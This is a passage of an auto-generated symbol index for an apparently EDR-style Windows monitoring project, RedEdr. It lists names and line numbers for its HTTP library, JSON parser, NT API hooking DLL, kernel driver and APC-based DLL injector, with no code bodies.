  function class (line 1105) | class ClientImpl {
  function getline (line 2771) | inline bool stream_line_reader::getline() {
  function append (line 2797) | inline void stream_line_reader::append(char c) {
  function mmap (line 2821) | inline mmap::~mmap() { close(); }
  function open (line 2823) | inline bool mmap::open(const char *path) {
  function close (line 2907) | inline void mmap::close() {
  function close_socket (line 2936) | inline int close_socket(socket_t sock) {
  function handle_EINTR (line 2944) | ssize_t handle_EINTR(T fn) {
  function read_socket (line 2954) | inline ssize_t read_socket(socket_t sock, void *ptr, size_t size, int fl...
  function socket_t (line 6473) | inline socket_t
  function bind_internal (line 6489) | inline int Server::bind_internal(const std::string &host, int port,
  function listen_internal (line 6515) | inline bool Server::listen_internal() {
  function process_and_close_socket (line 6967) | inline bool Server::process_and_close_socket(socket_t sock) {
  function copy_settings (line 7004) | inline void ClientImpl::copy_settings(const ClientImpl &rhs) {
  function socket_t (line 7048) | inline socket_t ClientImpl::create_client_socket(Error &error) const {
  function create_and_connect_socket (line 7069) | inline bool ClientImpl::create_and_connect_socket(Socket &socket,
  function shutdown_ssl (line 7077) | inline void ClientImpl::shutdown_ssl(Socket & /*socket*/,
  function shutdown_socket (line 7085) | inline void ClientImpl::shutdown_socket(Socket &socket) const {
  function close_socket (line 7090) | inline void ClientImpl::close_socket(Socket &socket) {
  function read_response_line (line 7109) | inline bool ClientImpl::read_response_line(Stream &strm, const Request &...
  function send (line 7145) | inline bool ClientImpl::send(Request &req, Response &res, Error &error) {
  function send_ (line 7155) | inline bool ClientImpl::send_(Request &req, Response &res, Error &error) {
  function Result (line 7244) | inline Result ClientImpl::send(const Request &req) {
  function Result (line 7249) | inline Result ClientImpl::send_(Request &&req) {
  function handle_request (line 7256) | inline bool ClientImpl::handle_request(Stream &strm, Request &req,
  function redirect (line 7333) | inline bool ClientImpl::redirect(Request &req, Response &res, Error &err...
  function write_content_with_provider (line 7390) | inline bool ClientImpl::write_content_with_provider(Stream &strm,
  function write_request (line 7415) | inline bool ClientImpl::write_request(Stream &strm, Request &req,
  function std (line 7533) | inline std::unique_ptr<Response> ClientImpl::send_with_content_provider(
  function Result (line 7612) | inline Result ClientImpl::send_with_content_provider(
  function process_request (line 7638) | inline bool ClientImpl::process_request(Stream &strm, Request &req,
  function ContentProviderWithoutLength (line 7718) | inline ContentProviderWithoutLength ClientImpl::get_multipart_content_pr...
  function process_socket (line 7762) | inline bool
  function Result (line 7772) | inline Result ClientImpl::Get(const std::string &path) {
  function Result (line 7776) | inline Result ClientImpl::Get(const std::string &path, Progress progress) {
  function Result (line 7780) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
  function Result (line 7784) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
  function Result (line 7795) | inline Result ClientImpl::Get(const std::string &path,
  function Result (line 7800) | inline Result ClientImpl::Get(const std::string &path,
  function Result (line 7807) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
  function Result (line 7812) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
  function Result (line 7819) | inline Result ClientImpl::Get(const std::string &path,
  function Result (line 7826) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
  function Result (line 7833) | inline Result ClientImpl::Get(const std::string &path,
  function Result (line 7841) | inline Result ClientImpl::Get(const std::string &path, const Headers &he...
  function Result (line 7860) | inline Result ClientImpl::Get(const std::string &path, const Params &par...
  function Result (line 7868) | inline Result ClientImpl::Get(const std::string &path, const Params &par...
  function Result (line 7876) | inline Result ClientImpl::Get(const std::string &path, const Params &par...
  function Result (line 7891) | inline Result ClientImpl::Head(const std::string &path) {
  function Result (line 7895) | inline Result ClientImpl::Head(const std::string &path,
  function Result (line 7905) | inline Result ClientImpl::Post(const std::string &path) {
  function Result (line 7909) | inline Result ClientImpl::Post(const std::string &path,
  function Result (line 7914) | inline Result ClientImpl::Post(const std::string &path, const char *body,
  function Result (line 7920) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 7927) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 7935) | inline Result ClientImpl::Post(const std::string &path, const std::strin...
  function Result (line 7940) | inline Result ClientImpl::Post(const std::string &path, const std::strin...
  function Result (line 7946) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 7954) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 7963) | inline Result ClientImpl::Post(const std::string &path, const Params &pa...
  function Result (line 7967) | inline Result ClientImpl::Post(const std::string &path, size_t content_l...
  function Result (line 7974) | inline Result ClientImpl::Post(const std::string &path,
  function Result (line 7980) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 7989) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 7997) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 8003) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 8010) | inline Result ClientImpl::Post(const std::string &path,
  function Result (line 8015) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 8024) | inline Result ClientImpl::Post(const std::string &path, const Headers &h...
  function Result (line 8037) | inline Result
  function Result (line 8050) | inline Result ClientImpl::Put(const std::string &path) {
  function Result (line 8054) | inline Result ClientImpl::Put(const std::string &path, const char *body,
  function Result (line 8060) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8067) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8075) | inline Result ClientImpl::Put(const std::string &path, const std::string...
  function Result (line 8080) | inline Result ClientImpl::Put(const std::string &path, const std::string...
  function Result (line 8086) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8094) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8103) | inline Result ClientImpl::Put(const std::string &path, size_t content_le...
  function Result (line 8110) | inline Result ClientImpl::Put(const std::string &path,
  function Result (line 8116) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8125) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8133) | inline Result ClientImpl::Put(const std::string &path, const Params &par...
  function Result (line 8137) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8143) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8150) | inline Result ClientImpl::Put(const std::string &path,
  function Result (line 8155) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8164) | inline Result ClientImpl::Put(const std::string &path, const Headers &he...
  function Result (line 8177) | inline Result
  function Result (line 8189) | inline Result ClientImpl::Patch(const std::string &path) {
  function Result (line 8193) | inline Result ClientImpl::Patch(const std::string &path, const char *body,
  function Result (line 8199) | inline Result ClientImpl::Patch(const std::string &path, const char *body,
  function Result (line 8206) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
  function Result (line 8212) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
  function Result (line 8221) | inline Result ClientImpl::Patch(const std::string &path,
  function Result (line 8227) | inline Result ClientImpl::Patch(const std::string &path,
  function Result (line 8234) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
  function Result (line 8240) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
  function Result (line 8249) | inline Result ClientImpl::Patch(const std::string &path, size_t content_...
  function Result (line 8256) | inline Result ClientImpl::Patch(const std::string &path,
  function Result (line 8262) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
  function Result (line 8271) | inline Result ClientImpl::Patch(const std::string &path, const Headers &...
  function Result (line 8279) | inline Result ClientImpl::Delete(const std::string &path) {
  function Result (line 8283) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8288) | inline Result ClientImpl::Delete(const std::string &path, const char *body,
  function Result (line 8294) | inline Result ClientImpl::Delete(const std::string &path, const char *body,
  function Result (line 8301) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8308) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8325) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8331) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8339) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8346) | inline Result ClientImpl::Delete(const std::string &path,
  function Result (line 8355) | inline Result ClientImpl::Options(const std::string &path) {
  function Result (line 8359) | inline Result ClientImpl::Options(const std::string &path,
  function stop (line 8369) | inline void ClientImpl::stop() {
  function set_connection_timeout (line 8403) | inline void ClientImpl::set_connection_timeout(time_t sec, time_t usec) {
  function set_read_timeout (line 8408) | inline void ClientImpl::set_read_timeout(time_t sec, time_t usec) {
  function set_write_timeout (line 8413) | inline void ClientImpl::set_write_timeout(time_t sec, time_t usec) {
  function set_basic_auth (line 8418) | inline void ClientImpl::set_basic_auth(const std::string &username,
  function set_bearer_token_auth (line 8424) | inline void ClientImpl::set_bearer_token_auth(const std::string &token) {
  function set_digest_auth (line 8429) | inline void ClientImpl::set_digest_auth(const std::string &username,
  function set_keep_alive (line 8436) | inline void ClientImpl::set_keep_alive(bool on) { keep_alive_ = on; }
  function set_follow_location (line 8438) | inline void ClientImpl::set_follow_location(bool on) { follow_location_ ...
  function set_url_encode (line 8440) | inline void ClientImpl::set_url_encode(bool on) { url_encode_ = on; }
  function set_hostname_addr_map (line 8442) | inline void
  function set_default_headers (line 8447) | inline void ClientImpl::set_default_headers(Headers headers) {
  function set_header_writer (line 8451) | inline void ClientImpl::set_header_writer(
  function set_address_family (line 8456) | inline void ClientImpl::set_address_family(int family) {
  function set_tcp_nodelay (line 8460) | inline void ClientImpl::set_tcp_nodelay(bool on) { tcp_nodelay_ = on; }
  function set_socket_options (line 8462) | inline void ClientImpl::set_socket_options(SocketOptions socket_options) {
  function set_compress (line 8466) | inline void ClientImpl::set_compress(bool on) { compress_ = on; }
  function set_decompress (line 8468) | inline void ClientImpl::set_decompress(bool on) { decompress_ = on; }
  function set_interface (line 8470) | inline void ClientImpl::set_interface(const std::string &intf) {
  function set_proxy (line 8474) | inline void ClientImpl::set_proxy(const std::string &host, int port) {
  function set_proxy_basic_auth (line 8479) | inline void ClientImpl::set_proxy_basic_auth(const std::string &username,
  function set_proxy_bearer_token_auth (line 8485) | inline void ClientImpl::set_proxy_bearer_token_auth(const std::string &t...
  function set_proxy_digest_auth (line 8490) | inline void ClientImpl::set_proxy_digest_auth(const std::string &username,
  function set_ca_cert_path (line 8496) | inline void ClientImpl::set_ca_cert_path(const std::string &ca_cert_file...
  function set_ca_cert_store (line 8502) | inline void ClientImpl::set_ca_cert_store(X509_STORE *ca_cert_store) {
  function X509_STORE (line 8508) | inline X509_STORE *ClientImpl::create_ca_cert_store(const char *ca_cert,
  function enable_server_certificate_verification (line 8535) | inline void ClientImpl::enable_server_certificate_verification(bool enab...
  function set_logger (line 8540) | inline void ClientImpl::set_logger(Logger logger) {
  function namespace (line 8548) | namespace detail {
  function is_readable (line 8679) | inline bool SSLSocketStream::is_readable() const {
  function write (line 8720) | inline ssize_t SSLSocketStream::write(const char *ptr, size_t size) {
  function SSLServer (line 8768) | inline SSLServer::SSLServer(const char *cert_path, const char *private_k...
  function SSLServer (line 8802) | inline SSLServer::SSLServer(X509 *cert, EVP_PKEY *private_key,
  function SSLServer (line 8826) | inline SSLServer::SSLServer(
  function SSLServer (line 8837) | inline SSLServer::~SSLServer() {
  function SSL_CTX (line 8843) | inline SSL_CTX *SSLServer::ssl_context() const { return ctx_; }
  function update_certs (line 8845) | inline void SSLServer::update_certs(X509 *cert, EVP_PKEY *private_key,
  function process_and_close_socket (line 8858) | inline bool SSLServer::process_and_close_socket(socket_t sock) {
  function SSLClient (line 8891) | inline SSLClient::SSLClient(const std::string &host)
  function SSLClient (line 8894) | inline SSLClient::SSLClient(const std::string &host, int port)
  function SSLClient (line 8897) | inline SSLClient::SSLClient(const std::string &host, int port,
  function SSLClient (line 8926) | inline SSLClient::SSLClient(const std::string &host, int port,
  function SSLClient (line 8952) | inline SSLClient::~SSLClient() {
  function set_ca_cert_store (line 8962) | inline void SSLClient::set_ca_cert_store(X509_STORE *ca_cert_store) {
  function load_ca_cert_store (line 8975) | inline void SSLClient::load_ca_cert_store(const char *ca_cert,
  function SSL_CTX (line 8984) | inline SSL_CTX *SSLClient::ssl_context() const { return ctx_; }
  function create_and_connect_socket (line 8986) | inline bool SSLClient::create_and_connect_socket(Socket &socket, Error &...
  function connect_with_proxy (line 8991) | inline bool SSLClient::connect_with_proxy(Socket &socket, Response &res,
  function load_certs (line 9059) | inline bool SSLClient::load_certs() {
  function initialize_ssl (line 9091) | inline bool SSLClient::initialize_ssl(Socket &socket, Error &error) {
  function shutdown_ssl (line 9157) | inline void SSLClient::shutdown_ssl(Socket &socket, bool shutdown_gracef...
  function shutdown_ssl_impl (line 9161) | inline void SSLClient::shutdown_ssl_impl(Socket &socket,
  function process_socket (line 9175) | inline bool
  function verify_host (line 9186) | inline bool SSLClient::verify_host(X509 *server_cert) const {
  function verify_host_with_subject_alt_name (line 9212) | inline bool
  function verify_host_with_common_name (line 9269) | inline bool SSLClient::verify_host_with_common_name(X509 *server_cert) c...

FILE: RedEdr/jsonw.hpp
  class JsonTokenW (line 23) | class JsonTokenW
    type Type (line 26) | enum class Type
    method JsonTokenW (line 44) | JsonTokenW(std::wistream& ins)
    method type (line 457) | enum Type type() const { return type_; }
    method int_fast64_t (line 458) | int_fast64_t integer() const { return integer_; }
    method frac (line 459) | long double frac() const { return frac_; }
    method wstring (line 460) | std::wstring wstring() const { return wstring_; }
    method boolean (line 461) | bool boolean() const { return boolean_; }
    method isskippable (line 465) | static bool isskippable(wchar_t character)
    method findnext (line 479) | static bool findnext(std::wistream& ins)
    method parse (line 525) | static bool parse(std::wistream& ins, std::queue<JsonTokenW>& tokens)
    type Type (line 549) | enum Type
  class JsonW (line 560) | class JsonW
    method JsonW (line 582) | JsonW()
    method JsonW (line 588) | explicit JsonW(const JsonW& rhs)
    method JsonW (line 593) | explicit JsonW(std::ifstream& fin)
    method JsonW (line 619) | explicit JsonW(const char* utf8str)
    method JsonW (line 635) | explicit JsonW(const wchar_t* wstr)
    method JsonW (line 647) | JsonW(const wchar_t* ucsdata, size_t size)
    method JsonW (line 662) | JsonW(const char* utf8data, size_t length)
    method JsonW (line 687) | JsonW(std::queue<JsonTokenW>& tokens)
    method parse (line 694) | void parse(std::queue<JsonTokenW>& tokens)
    method copy (line 751) | void copy(const JsonW& rhs)
    method valid (line 779) | bool valid() const { return valid_; }
    method type (line 782) | int type() const { return type_; }
    method size (line 793) | size_t size() const
    method integer (line 814) | long long integer() const { return integer_; }
    method frac (line 815) | long double frac() const { return frac_; }
    method wstr (line 816) | std::wstring wstr() const { return wstring_; }
    method str (line 817) | std::string str() const
    method boolean (line 822) | bool boolean() const { return boolean_; }
    method integer (line 824) | void integer(long long integer)
    method frac (line 831) | void frac(long double frac)
    method wstr (line 838) | void wstr(const std::wstring& wstr)
    method wstr (line 845) | void wstr(const wchar_t* wstr)
    method wstr (line 852) | void wstr(const wchar_t* wstr, size_t length)
    method str (line 860) | void str(const std::string& str)
    method str (line 868) | void str(const char* str)
    method str (line 876) | void str(const char* str, size_t length)
    method boolean (line 885) | void boolean(bool boolean)
    method reset (line 892) | void reset()
    method json (line 897) | void json(const std::string& text)
    method json (line 915) | void json(const char* text)
    method json (line 921) | void json(const char* text, size_t size)
    method wkeys (line 932) | void wkeys(std::vector<std::wstring>& keys) const
    method keys (line 945) | void keys(std::vector<std::string>& keys) const
    method get (line 961) | std::shared_ptr<JsonW> get(const std::wstring& wkey) const
    method get (line 972) | std::shared_ptr<JsonW> get(const std::string& key) const
    method erase (line 982) | bool erase(std::wstring wkey)
    method erase (line 994) | bool erase(std::string key)
    method add (line 1004) | bool add(std::wstring wkey, std::shared_ptr<JsonW> jvalue)
    method add (line 1022) | bool add(std::string key, std::shared_ptr<JsonW> jvalue)
    method add (line 1031) | bool add(std::wstring wkey, long long integer)
    method add (line 1038) | bool add(std::wstring wkey, long integer)
    method add (line 1043) | bool add(std::wstring wkey, int integer)
    method add (line 1048) | bool add(std::wstring wkey, short integer)
    method add (line 1053) | bool add(std::string key, long long integer)
    method add (line 1060) | bool add(std::string key, long integer)
    method add (line 1065) | bool add(std::string key, int integer)
    method add (line 1070) | bool add(std::string key, short integer)
    method add (line 1075) | bool add(std::wstring wkey, long double frac)
    method add (line 1082) | bool add(std::wstring wkey, double frac)
    method add (line 1087) | bool add(std::wstring wkey, float frac)
    method add (line 1092) | bool add(std::string key, long double frac)
    method add (line 1099) | bool add(std::string key, double frac)
    method add (line 1104) | bool add(std::string key, float frac)
    method add (line 1109) | bool add(std::wstring wkey, std::wstring wstr)
    method add (line 1116) | bool add(std::string key, std::string str)
    method add (line 1123) | bool add(std::wstring wkey, bool boolean)
    method add (line 1130) | bool add(std::string key, bool boolean)
    method get (line 1142) | std::shared_ptr<JsonW> get(size_t idx) const
    method add (line 1153) | bool add(std::shared_ptr<JsonW> junit)
    method add (line 1175) | bool add(long long integer)
    method add (line 1182) | bool add(long integer)
    method add (line 1187) | bool add(int integer)
    method add (line 1192) | bool add(short integer)
    method add (line 1197) | bool add(long double frac)
    method add (line 1204) | bool add(double frac)
    method add (line 1209) | bool add(float frac)
    method add (line 1214) | bool add(std::wstring wstr)
    method add (line 1221) | bool add(std::string str)
    method add (line 1228) | bool add(bool boolean)
    method erase (line 1237) | bool erase(size_t idx)
    method JsonW (line 1258) | JsonW& operator=(short value)
    method JsonW (line 1269) | JsonW& operator=(int value)
    method JsonW (line 1280) | JsonW& operator=(long value)
    method JsonW (line 1291) | JsonW& operator=(long long value)
    method JsonW (line 1302) | JsonW& operator=(long double value)
    method JsonW (line 1313) | JsonW& operator=(double value)
    method JsonW (line 1324) | JsonW& operator=(float value)
    method JsonW (line 1335) | JsonW& operator=(const wchar_t* value)
    method JsonW (line 1346) | JsonW& operator=(const std::wstring& value)
    method JsonW (line 1357) | JsonW& operator=(const char* value)
    method JsonW (line 1369) | JsonW& operator=(std::string value)
    method JsonW (line 1381) | JsonW& operator=(bool boolean)
    method JsonW (line 1393) | JsonW& operator=(const JsonW& junit)
    method JsonW (line 1399) | JsonW& operator[] (size_t index)
    method JsonW (line 1419) | JsonW& operator[] (int index)
    method JsonW (line 1444) | JsonW& operator[] (const char* name)
    method JsonW (line 1470) | JsonW& operator[] (const std::string& name)
    method JsonW (line 1496) | JsonW& operator[] (const wchar_t* name)
    method JsonW (line 1521) | JsonW& operator[] (const std::wstring& wname)
    method wtext (line 1544) | std::wstring wtext(bool singleline = true) const
    method text (line 1552) | std::string text(bool singleline = true) const
    method JsonW (line 1572) | static JsonW& bad()
    method jobject (line 1582) | static bool jobject(std::queue<JsonTokenW>& tokens, std::map<std::wstr...
    method jarray (line 1666) | static bool jarray(std::queue<JsonTokenW>& tokens, std::vector<std::sh...
    method clean (line 2061) | void clean()
    method init (line 2071) | void init(std::wistream& ins)

FILE: RedEdr/kernelinterface.cpp
  function BOOL (line 14) | BOOL ConfigureKernelDriver(int enable) {
  function BOOL (line 128) | BOOL LoadKernelDriver() {
  function BOOL (line 209) | BOOL UnloadKernelDriver() {

FILE: RedEdr/kernelreader.cpp
  function KernelReaderInit (line 31) | bool KernelReaderInit(std::vector<HANDLE>& threads) {
  function DWORD (line 60) | DWORD WINAPI KernelReaderProcessingThread(LPVOID param) {
  function KernelReaderShutdown (line 93) | void KernelReaderShutdown() {

FILE: RedEdr/logging.cpp
  function InitLogFile (line 25) | void InitLogFile() {
  function GetAgentLogs (line 36) | std::vector <std::string> GetAgentLogs() {
  function LOG_A (line 41) | void LOG_A(int verbosity, const char* format, ...)
  function LOG_W (line 110) | void LOG_W(int verbosity, const wchar_t* format, ...)

FILE: RedEdr/logreader.cpp
  function LogReaderStopAll (line 15) | void LogReaderStopAll() {
  function tailFileW (line 22) | void tailFileW(const wchar_t* filePath) {
  function findFiles (line 84) | std::wstring findFiles(const std::wstring& directory, const std::wstring...
  function DWORD (line 114) | DWORD WINAPI LogReaderProcessingThread(LPVOID param) {
  function BOOL (line 123) | BOOL InitializeLogReader(std::vector<HANDLE>& threads) {

FILE: RedEdr/manager.cpp
  function BOOL (line 27) | BOOL ManagerApplyNewTargets(std::vector<std::string> traceNames) {
  function BOOL (line 67) | BOOL ManagerStart(std::vector<HANDLE>& threads) {
  function ManagerShutdown (line 181) | void ManagerShutdown() {

FILE: RedEdr/pplmanager.cpp
  function BOOL (line 23) | BOOL ConnectPplService() {
  function BOOL (line 34) | BOOL EnablePplProducer(BOOL e, std::vector<std::string> targetNames, boo...
  function BOOL (line 75) | BOOL DisablePplProducer() {
  function BOOL (line 108) | BOOL StartThePplService() {
  function BOOL (line 129) | BOOL ShutdownPplService() {
  function BOOL (line 163) | BOOL InstallElamCertPpl()
  function BOOL (line 195) | BOOL InstallPplService()
  function BOOL (line 257) | BOOL StartPplService()
  function BOOL (line 304) | BOOL remove_ppl_service() {

FILE: RedEdr/pplreader.cpp
  function PplReaderInit (line 29) | bool PplReaderInit(std::vector<HANDLE>& threads) {
  function DWORD (line 63) | DWORD WINAPI PplReaderThread(LPVOID param) {
  function PplReaderClient (line 102) | void PplReaderClient(PipeServer* pipeServer) {
  function PplReaderShutdown (line 132) | void PplReaderShutdown() {

FILE: RedEdr/privileges.cpp
  function GetUserTokenForExecution (line 10) | bool GetUserTokenForExecution(HANDLE& hTokenDup) {
  function EnablePrivilege (line 81) | bool EnablePrivilege(HANDLE hToken, LPCWSTR privilege) {
  function CheckPrivilege (line 103) | bool CheckPrivilege(HANDLE hToken, LPCWSTR privilege) {
  function RunsAsSystem (line 123) | bool RunsAsSystem() {
  function BOOL (line 150) | BOOL RunsAsSystem_bak() {
  function RunsAsAdmin (line 213) | bool RunsAsAdmin() {
  function PrintCurrentUser (line 230) | void PrintCurrentUser() {
  function BOOL (line 239) | BOOL PermissionMakeMeDebug() {

FILE: RedEdr/serviceutils.cpp
  function BOOL (line 7) | BOOL DoesServiceExist(LPCWSTR serviceName) {
  function BOOL (line 31) | BOOL IsServiceRunning(LPCWSTR driverName) {

FILE: RedEdr/shared.js
  function displayEvents (line 3) | function displayEvents(events) {
  function myHex (line 84) | function myHex(num) {

FILE: RedEdr/webserver.cpp
  function StripToFirstDot (line 40) | std::wstring StripToFirstDot(const std::wstring& input) {
  function GetFilesInDirectory (line 49) | std::vector<std::wstring> GetFilesInDirectory(const std::wstring& direct...
  function getRecordingsAsJson (line 74) | std::string getRecordingsAsJson() {
  function GetPplLogs (line 95) | std::vector<std::string> GetPplLogs() {
  function HasAllowedExtension (line 111) | bool HasAllowedExtension(const std::string& filename, const std::vector<...
  function DWORD (line 121) | DWORD WINAPI WebserverThread(LPVOID param) {
  function InitializeWebServer (line 336) | int InitializeWebServer(std::vector<HANDLE>& threads, int port) {
  function StopWebServer (line 356) | void StopWebServer() {

FILE: RedEdrDll/detours.h
  type LONG (line 133) | typedef LONG LONG_PTR;
  type ULONG (line 134) | typedef ULONG ULONG_PTR;
  type GUID (line 333) | typedef struct  _GUID
  type DETOUR_TRAMPOLINE (line 384) | typedef struct _DETOUR_TRAMPOLINE DETOUR_TRAMPOLINE, *PDETOUR_TRAMPOLINE;
  type DETOUR_SECTION_HEADER (line 393) | typedef struct _DETOUR_SECTION_HEADER
  type DETOUR_SECTION_RECORD (line 418) | typedef struct _DETOUR_SECTION_RECORD
  type DETOUR_CLR_HEADER (line 425) | typedef struct _DETOUR_CLR_HEADER
  type DETOUR_EXE_RESTORE (line 439) | typedef struct _DETOUR_EXE_RESTORE
  type DETOUR_EXE_HELPER (line 481) | typedef struct _DETOUR_EXE_HELPER
  type VOID (line 554) | typedef VOID * PDETOUR_BINARY;
  type VOID (line 555) | typedef VOID * PDETOUR_LOADED_BINARY;
  type IMAGEHLP_MODULE (line 934) | typedef IMAGEHLP_MODULE IMAGEHLP_MODULE64;
  type PIMAGEHLP_MODULE (line 935) | typedef PIMAGEHLP_MODULE PIMAGEHLP_MODULE64;
  type IMAGEHLP_SYMBOL (line 936) | typedef IMAGEHLP_SYMBOL SYMBOL_INFO;
  type PIMAGEHLP_SYMBOL (line 937) | typedef PIMAGEHLP_SYMBOL PSYMBOL_INFO;
  function LONG (line 939) | static inline
  type DETOUR_SYM_INFO (line 972) | typedef struct _DETOUR_SYM_INFO
  type DETOUR_IA64_BUNDLE (line 1039) | struct DETOUR_IA64_BUNDLE

FILE: RedEdrDll/dllhelper.cpp
  type __Config (line 15) | struct __Config {
  type _MEMORY_INFORMATION_CLASS (line 26) | enum _MEMORY_INFORMATION_CLASS {
  function InitDllPipe (line 35) | void InitDllPipe() {
  function SendDllPipe (line 59) | void SendDllPipe(char* buffer) {
  function doInitSym (line 72) | void doInitSym(HANDLE hProcess) {
  function LogMyStackTrace (line 88) | size_t LogMyStackTrace(char* buf, size_t buf_size) {

FILE: RedEdrDll/dllmain.cpp
  function Unicodestring2wcharAlloc (line 20) | void Unicodestring2wcharAlloc(const UNICODE_STRING* ustr, wchar_t* dest,...
  function NTSTATUS (line 58) | static NTSTATUS NTAPI Catch_NtAllocateVirtualMemory(
  function NTSTATUS (line 122) | static NTSTATUS NTAPI Catch_NtFreeVirtualMemory(
  function NTSTATUS (line 181) | static NTSTATUS NTAPI Catch_NtProtectVirtualMemory(
  type _SECTION_INHERIT (line 228) | enum _SECTION_INHERIT {
  function NTSTATUS (line 247) | NTSTATUS NTAPI Catch_NtMapViewOfSection(
  function NTSTATUS (line 309) | NTSTATUS NTAPI Catch_NtWriteVirtualMemory(
  function NTSTATUS (line 351) | NTSTATUS NTAPI Catch_NtReadVirtualMemory(
  function NTSTATUS (line 428) | NTSTATUS NTAPI Catch_LdrLoadDll(
  function NTSTATUS (line 472) | NTSTATUS NTAPI Catch_LdrGetProcedureAddress(
  function NTSTATUS (line 519) | NTSTATUS NTAPI Catch_NtQueueApcThread(
  function NTSTATUS (line 558) | NTSTATUS NTAPI Catch_NtQueueApcThreadEx(
  function NTSTATUS (line 605) | NTSTATUS NTAPI Catch_NtCreateProcess(
  function NTSTATUS (line 651) | NTSTATUS NTAPI Catch_NtCreateThread(
  function NTSTATUS (line 706) | NTSTATUS NTAPI Catch_NtCreateThreadEx(
  function NTSTATUS (line 754) | NTSTATUS NTAPI Catch_NtOpenProcess(
  function NTSTATUS (line 790) | NTSTATUS NTAPI Catch_NtLoadDriver(
  function NTSTATUS (line 835) | NTSTATUS NTAPI Catch_NtCreateNamedPipeFile(
  function NTSTATUS (line 887) | NTSTATUS NTAPI Catch_NtOpenThread(
  function NTSTATUS (line 927) | NTSTATUS NTAPI Catch_NtCreateSection(
  function NTSTATUS (line 979) | NTSTATUS NTAPI Catch_NtCreateProcessEx(
  type _EVENT_TYPE (line 1018) | enum _EVENT_TYPE {
  function NTSTATUS (line 1031) | NTSTATUS NTAPI Catch_NtCreateEvent(
  type _TIMER_TYPE (line 1062) | enum _TIMER_TYPE {
  function NTSTATUS (line 1074) | NTSTATUS NTAPI Catch_NtCreateTimer(
  function NTSTATUS (line 1111) | NTSTATUS NTAPI Catch_NtCreateTimer2(
  function NTSTATUS (line 1266) | NTSTATUS NTAPI Catch_NtResumeThread(
  function DWORD (line 1295) | DWORD WINAPI InitHooksThread(LPVOID param) {
  function BOOL (line 1389) | BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)

FILE: RedEdrDll/logging.cpp
  function LOG_A (line 5) | void LOG_A(int verbosity, const char* format, ...)
  function LOG_W (line 19) | void LOG_W(int verbosity, const wchar_t* format, ...)

FILE: RedEdrDriver/Driver.c
  function NTSTATUS (line 25) | NTSTATUS MyDriverDeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
  function LoadKernelCallbacks (line 139) | void LoadKernelCallbacks() {
  function RedEdrUnload (line 224) | void RedEdrUnload(_In_ PDRIVER_OBJECT DriverObject) {
  function NTSTATUS (line 255) | NTSTATUS MyDriverCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
  function NTSTATUS (line 266) | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STR...

FILE: RedEdrDriver/hashcache.c
  function NTSTATUS (line 11) | NTSTATUS InitializeHashTable()
  function NTSTATUS (line 19) | NTSTATUS AddProcessInfo(HANDLE ProcessId, PPROCESS_INFO ProcessInfo)
  function PPROCESS_INFO (line 46) | PPROCESS_INFO LookupProcessInfo(HANDLE ProcessId)
  function NTSTATUS (line 68) | NTSTATUS RemoveProcessInfo(HANDLE ProcessId)
  function VOID (line 98) | VOID FreeHashTable()
  function ULONG (line 134) | ULONG HashFunction(HANDLE ProcessId)

FILE: RedEdrDriver/hashcache.h
  type PROCESS_INFO (line 9) | typedef struct _PROCESS_INFO {
  type HASH_ENTRY (line 23) | typedef struct _HASH_ENTRY {

FILE: RedEdrDriver/kapcinjector.c
  type PVOID (line 25) | typedef PVOID(*fnLoadLibraryExA)(
  type INJECTION_DATA (line 31) | typedef struct _INJECTION_DATA // _SIRIFEF_INJECTION_DATA in article
  type GET_ADDRESS (line 41) | typedef struct GET_ADDRESS
  type KAPC_ENVIRONMENT (line 48) | typedef enum _KAPC_ENVIRONMENT
  type VOID (line 62) | typedef VOID KKERNEL_ROUTINE(
  function VOID (line 96) | VOID NTAPI APCKernelRoutine(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, ...
  function NTSTATUS (line 107) | NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS PeProcess, PETHREAD PeThr...
  function VOID (line 189) | VOID WorkerRoutine(PVOID Context)
  function VOID (line 200) | VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine...
